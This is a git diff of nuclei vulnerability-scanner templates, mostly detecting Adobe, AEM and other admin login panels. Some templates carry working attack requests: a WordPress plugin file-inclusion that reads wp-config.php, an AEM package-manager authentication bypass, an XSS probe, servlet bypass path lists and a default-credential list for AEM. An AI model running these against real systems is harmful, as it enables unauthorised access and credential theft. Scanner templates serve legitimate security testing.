words: - - "Login - Adminer" - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '([0-9.]+)' - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adminset-panel-78.yaml b/nuclei-templates/Other/adminset-panel-78.yaml deleted file mode 100644 index b9f1644f02..0000000000 --- a/nuclei-templates/Other/adminset-panel-78.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: adminset-panel - -info: - name: Adminset Panel - author: ffffffff0x - severity: info - metadata: - fofa-query: app="AdminSet" - vendor: https://github.com/guhongze/adminset/ - tags: adminset,panel - -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "AdminSet Login" - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/adminset-panel-80.yaml b/nuclei-templates/Other/adminset-panel-80.yaml new file mode 100644 index 0000000000..c539d29be5 --- /dev/null +++ b/nuclei-templates/Other/adminset-panel-80.yaml @@ -0,0 +1,34 @@ +id: adminset-panel + +info: + name: Adminset Login Panel + author: ffffffff0x + severity: info + description: An Adminset login panel was detected. + classification: + cwe-id: CWE-200 + metadata: + fofa-query: app="AdminSet" + reference: + - https://github.com/guhongze/adminset/ + tags: adminset,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "AdminSet Login" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adobe-coldfusion-error-detect-88.yaml b/nuclei-templates/Other/adobe-coldfusion-error-detect-86.yaml similarity index 100% rename from nuclei-templates/Other/adobe-coldfusion-error-detect-88.yaml rename to nuclei-templates/Other/adobe-coldfusion-error-detect-86.yaml diff --git a/nuclei-templates/Other/adobe-component-login-89.yaml b/nuclei-templates/Other/adobe-component-login-89.yaml new file mode 100644 index 0000000000..1d46e94118 --- /dev/null +++ b/nuclei-templates/Other/adobe-component-login-89.yaml @@ -0,0 +1,31 @@ +id: adobe-coldfusion-login + +info: + name: Adobe ColdFusion Component Browser Login Panel + author: dhiyaneshDK + severity: info + description: An Adobe ColdFusion Component Browser login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6846 + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.component:"Adobe ColdFusion" + tags: panel,adobe,coldfusion + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/componentutils/login.cfm' + - '{{BaseURL}}/cfide/componentutils/login.cfm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Component Browser Login' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adobe-component-login.yaml b/nuclei-templates/Other/adobe-component-login.yaml deleted file mode 100644 index 9b423f9a58..0000000000 --- a/nuclei-templates/Other/adobe-component-login.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: adobe-coldfusion-login - -info: - name: Adobe ColdFusion Component Browser Login Panel - author: dhiyaneshDK - description: An Adobe ColdFusion Component Browser login panel was detected. - severity: info - reference: - - https://www.exploit-db.com/ghdb/6846 - tags: panel,adobe,coldfusion - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/CFIDE/componentutils/login.cfm' - - '{{BaseURL}}/cfide/componentutils/login.cfm' - - matchers-condition: and - matchers: - - type: word - words: - - 'Component Browser Login' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adobe-connect-central-login-93.yaml b/nuclei-templates/Other/adobe-connect-central-login-93.yaml deleted file mode 100644 index fd70acd2de..0000000000 --- a/nuclei-templates/Other/adobe-connect-central-login-93.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: adobe-connect-central-login - -info: - name: Adobe Connect Central Login - author: dhiyaneshDk - severity: info - tags: adobe,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/system/login" - - matchers-condition: and - matchers: - - type: word - words: - - 'Adobe Connect Central Login' - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/adobe-connect-central-login-97.yaml b/nuclei-templates/Other/adobe-connect-central-login-97.yaml new file mode 100644 index 0000000000..9f025cb957 --- /dev/null +++ b/nuclei-templates/Other/adobe-connect-central-login-97.yaml @@ -0,0 +1,30 @@ +id: adobe-connect-central-login + +info: + name: Adobe Connect Central Login Panel + author: dhiyaneshDk + severity: info + description: An Adobe Connect Central login panel was detected. + reference: + - https://www.adobe.com/products/adobeconnect.html + classification: + cwe-id: CWE-200 + tags: adobe,panel,connect-central + +requests: + - method: GET + path: + - "{{BaseURL}}/system/login" + + matchers-condition: and + matchers: + - type: word + words: + - 'Adobe Connect Central Login' + part: body + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adobe-connect-username-exposure-101.yaml b/nuclei-templates/Other/adobe-connect-username-exposure-101.yaml deleted file mode 100644 index 2e4d3089a9..0000000000 --- a/nuclei-templates/Other/adobe-connect-username-exposure-101.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: adobe-connect-username-exposure - -info: - name: Adobe Connect Username Exposure - author: dhiyaneshDk - severity: low - reference: - - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - tags: adobe,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/system/help/support" - - matchers-condition: and - matchers: - - type: word - words: - - 'Administrators name:' - - 'Support Administrators email address:' - part: body - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/adobe-connect-username-exposure.yaml b/nuclei-templates/Other/adobe-connect-username-exposure.yaml new file mode 100644 index 0000000000..088b39ad5e --- /dev/null +++ b/nuclei-templates/Other/adobe-connect-username-exposure.yaml @@ -0,0 +1,26 @@ +id: adobe-connect-username-exposure + +info: + name: Adobe Connect Username Exposure + reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html + author: dhiyaneshDk + severity: low + tags: adobe,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/system/help/support" + + matchers-condition: and + matchers: + - type: word + words: + - 'Administrators name:' + - 'Support Administrators email address:' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/adobe-connect-version-104.yaml b/nuclei-templates/Other/adobe-connect-version.yaml similarity index 100% rename from nuclei-templates/Other/adobe-connect-version-104.yaml rename to nuclei-templates/Other/adobe-connect-version.yaml diff --git a/nuclei-templates/Other/adobe-experience-manager-login-109.yaml b/nuclei-templates/Other/adobe-experience-manager-login-109.yaml deleted file mode 100644 index c1a0f41886..0000000000 --- a/nuclei-templates/Other/adobe-experience-manager-login-109.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: adobe-experience-manager-login - -info: - name: Adobe Experience Manager Login Panel - author: dhiyaneshDK - severity: info - description: An Adobe Experience Manager login panel was detected. - reference: - - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 - - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html - classification: - cwe-id: CWE-200 - tags: panel,aem,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}/libs/granite/core/content/login.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'AEM Sign In' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adobe-experience-manager-login.yaml b/nuclei-templates/Other/adobe-experience-manager-login.yaml new file mode 100644 index 0000000000..4dbdef1e18 --- /dev/null +++ b/nuclei-templates/Other/adobe-experience-manager-login.yaml @@ -0,0 +1,33 @@ +id: adobe-experience-manager-login + +info: + name: Adobe Experience Manager Login Panel + author: dhiyaneshDK + description: An Adobe Experience Manager login panel was detected. + severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 + - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html + tags: panel,aem,adobe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/libs/granite/core/content/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'AEM Sign In' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adobe-media-server-110.yaml b/nuclei-templates/Other/adobe-media-server-110.yaml new file mode 100644 index 0000000000..2ee6efc2c8 --- /dev/null +++ b/nuclei-templates/Other/adobe-media-server-110.yaml @@ -0,0 +1,30 @@ +id: adobe-media-server + +info: + name: Adobe Media Server Login Panel + author: dhiyaneshDK + severity: info + description: An Adobe Media Server login panel was detected. + reference: + - https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 + - https://helpx.adobe.com/support/adobe-media-server.html + classification: + cwe-id: CWE-200 + tags: panel,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Adobe Media Server' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adobe-media-server.yaml b/nuclei-templates/Other/adobe-media-server.yaml deleted file mode 100644 index deaf55913a..0000000000 --- a/nuclei-templates/Other/adobe-media-server.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: adobe-media-server - -info: - name: Adobe Media Server - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 - tags: panel,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'Adobe Media Server' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/advance-setup-119.yaml b/nuclei-templates/Other/advance-setup-119.yaml deleted file mode 100644 index bbee2bbcf7..0000000000 --- a/nuclei-templates/Other/advance-setup-119.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: advanced-setup-login - -info: - name: ActionTec Modem Advanced Setup Login Panel - author: dhiyaneshDK - severity: info - description: An ActionTec Modem Advanced Setup login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6819 - - https://www.actiontec.com/dsl/ - classification: - cwe-id: CWE-200 - tags: panel,setup - -requests: - - method: GET - path: - - '{{BaseURL}}/cgi-bin/webcm?getpage=../html/login.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'Advanced Setup - Security - Admin User Name & Password' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/advance-setup-122.yaml b/nuclei-templates/Other/advance-setup-122.yaml new file mode 100644 index 0000000000..629d3b1e84 --- /dev/null +++ b/nuclei-templates/Other/advance-setup-122.yaml @@ -0,0 +1,32 @@ +id: advanced-setup-login + +info: + name: ActionTec Modem Advanced Setup Login Panel + author: dhiyaneshDK + description: An ActionTec Modem Advanced Setup login panel was detected. + severity: info + reference: + - https://www.exploit-db.com/ghdb/6819 + - https://www.actiontec.com/dsl/ + tags: panel,setup + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/cgi-bin/webcm?getpage=../html/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'Advanced Setup - Security - Admin User Name & Password' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/advanced-access-manager-lfi-116.yaml b/nuclei-templates/Other/advanced-access-manager-lfi-116.yaml new file mode 100644 index 0000000000..9838f210f1 --- /dev/null +++ b/nuclei-templates/Other/advanced-access-manager-lfi-116.yaml @@ -0,0 +1,29 @@ +id: advanced-access-manager-lfi + +info: + name: Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion + author: 0x_Akoko + severity: high + description: The Advanced Access Manager WordPress plugin, versions before 5.9.9, allowed reading arbitrary files. This way one can download the wp-config.php file and get access to the database, which is publicly reachable on many servers. + reference: + - https://wpscan.com/vulnerability/9873 + - https://id.wordpress.org/plugins/advanced-access-manager/ + tags: wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/?aam-media=wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/advanced-access-manager-lfi.yaml b/nuclei-templates/Other/advanced-access-manager-lfi.yaml deleted file mode 100644 index 653f312d6c..0000000000 --- a/nuclei-templates/Other/advanced-access-manager-lfi.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: advanced-access-manager-lfi -info: - name: WordPress Advanced Access Manager <5.9.9 - Local File Inclusion - author: 0x_Akoko - severity: high - description: WordPress Advanced Access Manager versions before 5.9.9 are vulnerable to local file inclusion and allows attackers to download the wp-config.php file and get access to the database, which is publicly reachable on many servers. - reference: - - https://wpscan.com/vulnerability/9873 - - https://id.wordpress.org/plugins/advanced-access-manager/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi -requests: - - method: GET - path: - - '{{BaseURL}}/?aam-media=wp-config.php' - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/01 diff --git a/nuclei-templates/Other/aem-childrenlist-xss.yaml b/nuclei-templates/Other/aem-childrenlist-xss.yaml new file mode 100644 index 0000000000..d5107fd8bf --- /dev/null +++ b/nuclei-templates/Other/aem-childrenlist-xss.yaml @@ -0,0 +1,50 @@ +id: aem-xss-childlist + +info: + name: Adobe Experience Manager Childlist Selector - Cross-Site Scripting + author: theabhinavgaur,ott3rly + severity: medium + description: | + Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the c> + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-80 + metadata: + verified: true + max-request: 2 + shodan-query: + - http.title:"AEM Sign In" + - http.component:"Adobe Experience Manager" + tags: xss,aem,adobe,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/{{rand_base(4)}}.childrenlist.html" + - "{{BaseURL}}/{{rand_base(4)}}

please%20authenticate

.childrenlist.html" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - '

please authenticate

' + condition: or + + - type: word + part: body + words: + - 'data-coral-columnview-id' + + - type: word + part: content_type + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aem-crx-bypass-134.yaml b/nuclei-templates/Other/aem-crx-bypass-134.yaml new file mode 100644 index 0000000000..cdb6438ebc --- /dev/null +++ b/nuclei-templates/Other/aem-crx-bypass-134.yaml @@ -0,0 +1,46 @@ +id: aem-crx-bypass + +info: + name: AEM Package Manager - Authentication Bypass + author: dhiyaneshDK + description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed. + severity: critical + remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages." + reference: + - https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ + tags: aem,adobe + +requests: + - raw: + - | + GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + + - | + GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'buildCount' + - 'downloadName' + - 'acHandling' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/Other/aem-crx-bypass.yaml b/nuclei-templates/Other/aem-crx-bypass.yaml deleted file mode 100644 index a6187d442a..0000000000 --- a/nuclei-templates/Other/aem-crx-bypass.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: aem-crx-bypass - -info: - author: dhiyaneshDK - name: AEM CRX Bypass - severity: critical - reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ - tags: aem - -requests: - - raw: - - | - GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - - - | - GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'buildCount' - - 'downloadName' - - 'acHandling' - condition: and - - - type: word - part: header - words: - - 'application/json' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aem-default-get-servlet-135.yaml b/nuclei-templates/Other/aem-default-get-servlet-135.yaml deleted file mode 100644 index cd831dbd52..0000000000 --- a/nuclei-templates/Other/aem-default-get-servlet-135.yaml +++ /dev/null @@ -1,80 +0,0 @@ -id: aem-default-get-servlet -info: - author: DhiyaneshDk - name: AEM DefaultGetServlet - severity: low - reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 - tags: aem - - -requests: - - method: GET - path: - - '{{BaseURL}}/.json' - - '{{BaseURL}}/.1.json' - - '{{BaseURL}}/....4.2.1....json' - - '{{BaseURL}}/.json?FNZ.css' - - '{{BaseURL}}/.json?FNZ.ico' - - '{{BaseURL}}/.json?FNZ.html' - - '{{BaseURL}}/.json/FNZ.css' - - '{{BaseURL}}/.json/FNZ.html' - - '{{BaseURL}}/.json/FNZ.png' - - '{{BaseURL}}/.json/FNZ.ico' - - '{{BaseURL}}/.children.1.json' - - '{{BaseURL}}/.children....4.2.1....json' - - '{{BaseURL}}/.children.json?FNZ.css' - - '{{BaseURL}}/.children.json?FNZ.ico' - - '{{BaseURL}}/.children.json?FNZ.html' - - '{{BaseURL}}/.children.json/FNZ.css' - - '{{BaseURL}}/.children.json/FNZ.html' - - '{{BaseURL}}/.children.json/FNZ.png' - - '{{BaseURL}}/.children.json/FNZ.ico' - - '{{BaseURL}}/etc.json' - - '{{BaseURL}}/etc.1.json' - - '{{BaseURL}}/etc....4.2.1....json' - - '{{BaseURL}}/etc.json?FNZ.css' - - '{{BaseURL}}/etc.json?FNZ.ico' - - '{{BaseURL}}/etc.json?FNZ.html' - - '{{BaseURL}}/etc.json/FNZ.css' - - '{{BaseURL}}/etc.json/FNZ.html' - - '{{BaseURL}}/etc.json/FNZ.ico' - - '{{BaseURL}}/etc.children.json' - - '{{BaseURL}}/etc.children.1.json' - - '{{BaseURL}}/etc.children....4.2.1....json' - - '{{BaseURL}}/etc.children.json?FNZ.css' - - '{{BaseURL}}/etc.children.json?FNZ.ico' - - '{{BaseURL}}/etc.children.json?FNZ.html' - - '{{BaseURL}}/etc.children.json/FNZ.css' - - '{{BaseURL}}/etc.children.json/FNZ.html' - - '{{BaseURL}}/etc.children.json/FNZ.png' - - '{{BaseURL}}/etc.children.json/FNZ.ico' - - '{{BaseURL}}///etc.json' - - '{{BaseURL}}///etc.1.json' - - '{{BaseURL}}///etc....4.2.1....json' - - '{{BaseURL}}///etc.json?FNZ.css' - - '{{BaseURL}}///etc.json?FNZ.ico' - - '{{BaseURL}}///etc.json/FNZ.html' - - '{{BaseURL}}///etc.json/FNZ.png' - - '{{BaseURL}}///etc.json/FNZ.ico' - - '{{BaseURL}}///etc.children.json' - - '{{BaseURL}}///etc.children.1.json' - - '{{BaseURL}}///etc.children....4.2.1....json' - - '{{BaseURL}}///etc.children.json?FNZ.css' - - '{{BaseURL}}///etc.children.json?FNZ.ico' - - '{{BaseURL}}///etc.children.json?FNZ.html' - - '{{BaseURL}}///etc.children.json/FNZ.css' - - '{{BaseURL}}///etc.children.json/FNZ.html' - - '{{BaseURL}}///etc.children.json/FNZ.png' - - '{{BaseURL}}///etc.children.json/FNZ.ico' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'jcr:createdBy' - condition: and diff --git a/nuclei-templates/Other/aem-default-get-servlet-138.yaml b/nuclei-templates/Other/aem-default-get-servlet-138.yaml new file mode 100644 index 0000000000..d3546ab204 --- /dev/null +++ b/nuclei-templates/Other/aem-default-get-servlet-138.yaml @@ -0,0 +1,78 @@ +id: aem-default-get-servlet +info: + author: DhiyaneshDk + name: AEM DefaultGetServlet + severity: low + reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 + tags: aem + + +requests: + - method: GET + path: + - '{{BaseURL}}/.json' + - '{{BaseURL}}/.1.json' + - '{{BaseURL}}/....4.2.1....json' + - '{{BaseURL}}/.json?FNZ.css' + - '{{BaseURL}}/.json?FNZ.ico' + - '{{BaseURL}}/.json?FNZ.html' + - '{{BaseURL}}/.json/FNZ.css' + - '{{BaseURL}}/.json/FNZ.html' + - '{{BaseURL}}/.json/FNZ.png' + - '{{BaseURL}}/.json/FNZ.ico' + - '{{BaseURL}}/.children.1.json' + - '{{BaseURL}}/.children....4.2.1....json' + - '{{BaseURL}}/.children.json?FNZ.css' + - '{{BaseURL}}/.children.json?FNZ.ico' + - '{{BaseURL}}/.children.json?FNZ.html' + - '{{BaseURL}}/.children.json/FNZ.css' + - '{{BaseURL}}/.children.json/FNZ.html' + - '{{BaseURL}}/.children.json/FNZ.png' + - '{{BaseURL}}/.children.json/FNZ.ico' + - '{{BaseURL}}/etc.json' + - '{{BaseURL}}/etc.1.json' + - '{{BaseURL}}/etc....4.2.1....json' + - '{{BaseURL}}/etc.json?FNZ.css' + - '{{BaseURL}}/etc.json?FNZ.ico' + - '{{BaseURL}}/etc.json?FNZ.html' + - '{{BaseURL}}/etc.json/FNZ.css' + - '{{BaseURL}}/etc.json/FNZ.html' + - '{{BaseURL}}/etc.json/FNZ.ico' + - '{{BaseURL}}/etc.children.json' + - '{{BaseURL}}/etc.children.1.json' + - '{{BaseURL}}/etc.children....4.2.1....json' + - '{{BaseURL}}/etc.children.json?FNZ.css' + - '{{BaseURL}}/etc.children.json?FNZ.ico' + - '{{BaseURL}}/etc.children.json?FNZ.html' + - '{{BaseURL}}/etc.children.json/FNZ.css' + - '{{BaseURL}}/etc.children.json/FNZ.html' + - '{{BaseURL}}/etc.children.json/FNZ.png' + - '{{BaseURL}}/etc.children.json/FNZ.ico' + - '{{BaseURL}}///etc.json' + - '{{BaseURL}}///etc.1.json' + - '{{BaseURL}}///etc....4.2.1....json' + - '{{BaseURL}}///etc.json?FNZ.css' + - '{{BaseURL}}///etc.json?FNZ.ico' + - '{{BaseURL}}///etc.json/FNZ.html' + - '{{BaseURL}}///etc.json/FNZ.png' + - '{{BaseURL}}///etc.json/FNZ.ico' + - '{{BaseURL}}///etc.children.json' + - '{{BaseURL}}///etc.children.1.json' + - '{{BaseURL}}///etc.children....4.2.1....json' + - '{{BaseURL}}///etc.children.json?FNZ.css' + - '{{BaseURL}}///etc.children.json?FNZ.ico' + - '{{BaseURL}}///etc.children.json?FNZ.html' + - '{{BaseURL}}///etc.children.json/FNZ.css' + - '{{BaseURL}}///etc.children.json/FNZ.html' + - '{{BaseURL}}///etc.children.json/FNZ.png' + - '{{BaseURL}}///etc.children.json/FNZ.ico' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'jcr:createdBy' + condition: and diff --git a/nuclei-templates/Other/aem-default-login-142.yaml b/nuclei-templates/Other/aem-default-login-142.yaml index 66a6189c19..5d614791b3 100644 --- a/nuclei-templates/Other/aem-default-login-142.yaml +++ b/nuclei-templates/Other/aem-default-login-142.yaml @@ -1,5 +1,4 @@ id: aem-default-login - info: name: Adobe AEM Default Login author: random-robbie @@ -14,7 +13,6 @@ info: metadata: shodan-query: http.component:"Adobe Experience Manager" tags: aem,default-login,adobe - requests: - raw: - | @@ -25,7 +23,6 @@ requests: Referer: {{BaseURL}}/libs/granite/core/content/login.html _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true - attack: pitchfork payloads: aem_user: @@ -37,7 +34,6 @@ requests: - anonymous - jdoe@geometrixx.info - aparker@geometrixx.info - aem_pass: - admin - password @@ -47,14 +43,12 @@ requests: - anonymous - jdoe - aparker - stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 - - type: word part: header words: diff --git a/nuclei-templates/Other/aem-gql-servlet-147.yaml b/nuclei-templates/Other/aem-gql-servlet-147.yaml new file mode 100644 index 0000000000..36a597b300 --- /dev/null +++ b/nuclei-templates/Other/aem-gql-servlet-147.yaml @@ -0,0 +1,26 @@ +id: aem-gql-servlet + +info: + author: DhiyaneshDk + name: AEM GQLServlet + severity: low + reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html + tags: aem + + +requests: + - method: GET + path: + - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'excerpt' + - 'path' + - 'hits' + condition: and diff --git a/nuclei-templates/Other/aem-gql-servlet-149.yaml b/nuclei-templates/Other/aem-gql-servlet-149.yaml deleted file mode 100644 index 977dc70f75..0000000000 --- a/nuclei-templates/Other/aem-gql-servlet-149.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: aem-gql-servlet - -info: - name: AEM GQLServlet - author: dhiyaneshDk,prettyboyaaditya - severity: low - reference: - - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html - tags: aem - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico' - - '{{BaseURL}}/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix=' - 